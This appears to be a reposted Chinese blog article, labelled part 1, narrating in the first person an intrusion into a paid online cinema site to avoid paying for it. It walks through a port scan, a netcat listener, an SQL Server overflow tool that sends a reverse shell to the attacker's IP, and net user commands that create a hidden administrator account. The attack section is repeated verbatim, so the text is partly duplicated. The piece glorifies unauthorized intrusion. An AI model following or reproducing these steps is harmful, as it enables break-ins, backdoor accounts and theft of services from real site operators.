黑客入侵“在线影院”全过程1
程序员文章站
2022-04-26 19:27:50
最近对网上看电影比较感兴趣,于是登录至某“在线影院”。本以为是免费,谁知问我要账号和密码,我可不想为这个掏钱。怎么办?先探探路。对我而言,入侵的过程是充满乐趣的... 08-10-08...
最近对网上看电影比较感兴趣,于是登录至某“在线影院”。本以为是免费,谁知问我要账号和密码,我可不想为这个掏钱。怎么办?先探探路。对我而言,入侵的过程是充满乐趣的,它刺激着我大脑的每一根神经,让我兴奋无比。我喜欢体味这种思维无拘放荡的快感,我喜欢沉醉其中。这是黑客营人的风格。于是,x-scan开始勤恳地跑在了我的桌面上。
破门:久违的溢出工具
用x-scan对该站点的server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有windows用户献上的最大的“木马”。
通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用sql2溢出工具试试?
先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该sql2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方ip,61.157.*.*是我自己的ip,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了c:\winnt\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。
我很幸运地得到了对方的一个shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。
破门:久违的溢出工具
用x-scan对该站点的server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有windows用户献上的最大的“木马”。
通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用sql2溢出工具试试?
先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该sql2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方ip,61.157.*.*是我自己的ip,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了c:\winnt\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。
我很幸运地得到了对方的一个shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。
上一篇: 快速完成网站运营指标的8个技巧
下一篇: 马云说:京东将来会成为悲剧